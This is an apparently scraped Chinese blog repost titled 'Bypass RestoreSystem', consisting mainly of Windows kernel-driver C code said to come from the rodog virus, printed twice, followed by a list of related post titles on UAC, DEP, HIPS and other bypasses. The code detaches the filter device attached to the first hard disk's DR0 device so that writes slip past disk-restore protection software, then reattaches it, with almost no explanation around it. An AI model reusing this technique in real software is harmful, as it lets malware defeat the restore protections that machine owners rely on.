Bypass RestoreSystem
来源:互联网 发布:北京外国语大学网络 编辑:程序博客网 时间:2024/05/01 07:04
来自 rodog病毒
//感谢QQ上某某兄弟的放出来的rodog病毒无壳无下载者版本~
#define PCIHDD_DR0DEVICE_NAME L"//Device//Harddisk0//DR0"
PDEVICE_OBJECT HddDr0Device = NULL;
PDEVICE_OBJECT HddAttDevice = NULL;
void BypassDisk()
{
UNICODE_STRING objectName;
PDEVICE_OBJECT hardObject = NULL;
PFILE_OBJECT fileObject = NULL;
NTSTATUS status;
RtlInitUnicodeString(&objectName, PCIHDD_DR0DEVICE_NAME);
status = IoGetDeviceObjectPointer(&objectName, FILE_READ_ATTRIBUTES, &fileObject, &hardObject);
ASSERT(NT_SUCCESS(status));
HddDr0Device = fileObject->DeviceObject; // 说明 : HddDr0Device->AttachedDevice 就是 hardObject
if(HddDr0Device->AttachedDevice)
{ // 保存DR0上的附加设备, 然后断开附加, 等EndBypass时恢复附加
HddAttDevice = InterlockedExchangePointer((PVOID*)&HddDr0Device->AttachedDevice, NULL);
}
ObDereferenceObject(fileObject);
}
void EndBypass()
{
if(HddDr0Device && HddAttDevice)
{ // 恢复DR0上的附加设备
HddDr0Device->AttachedDevice = HddAttDevice;
}
}
//感谢QQ上某某兄弟的放出来的rodog病毒无壳无下载者版本~
#define PCIHDD_DR0DEVICE_NAME L"//Device//Harddisk0//DR0"
PDEVICE_OBJECT HddDr0Device = NULL;
PDEVICE_OBJECT HddAttDevice = NULL;
void BypassDisk()
{
UNICODE_STRING objectName;
PDEVICE_OBJECT hardObject = NULL;
PFILE_OBJECT fileObject = NULL;
NTSTATUS status;
RtlInitUnicodeString(&objectName, PCIHDD_DR0DEVICE_NAME);
status = IoGetDeviceObjectPointer(&objectName, FILE_READ_ATTRIBUTES, &fileObject, &hardObject);
ASSERT(NT_SUCCESS(status));
HddDr0Device = fileObject->DeviceObject; // 说明 : HddDr0Device->AttachedDevice 就是 hardObject
if(HddDr0Device->AttachedDevice)
{ // 保存DR0上的附加设备, 然后断开附加, 等EndBypass时恢复附加
HddAttDevice = InterlockedExchangePointer((PVOID*)&HddDr0Device->AttachedDevice, NULL);
}
ObDereferenceObject(fileObject);
}
void EndBypass()
{
if(HddDr0Device && HddAttDevice)
{ // 恢复DR0上的附加设备
HddDr0Device->AttachedDevice = HddAttDevice;
}
}
- Bypass RestoreSystem
- Bypass FsdFilter
- bypass ujvc
- ByPass UAC
- bypass更新
- bypass open_basedir
- DEP bypass
- Bypass Graphics.MeasureString limitations
- bypass HIPS CreateRemoteThread Monitor
- bypass HIPS CreateRemoteThread Monitor
- sudo protection bypass exploit
- Bypass XSS filters (Paper)
- Bypass Preventing CSRF
- Bypass Hardware DEP Tips
- win7 UAC bypass
- Huawei HG866 Authentication Bypass
- ModSecurity 2.6.8 Bypass
- Bypass Preventing CSRF
- 几个速度不错而且可用网上电台
- bypass HIPS CreateRemoteThread Monitor
- 如何创建VPN的拨号连接
- Excel编程——获得Excel中的函数
- C6000与C2000系列DSP之间串行数据通讯的研究与实现
- Bypass RestoreSystem
- VPN基础知识详解
- 基于无线传感器网络的电机运行状态监测系统设计
- SecotrReadWrite
- svn服务器安装配置与svn的eclipse的subclipse插件使用
- 我的第一篇
- GridView选中,编辑,取消,删除:
- ASP.NET Web Service如何工作(1)
- 回顾过去,展望“钱”景——2007年软件开发者薪资调查报告收藏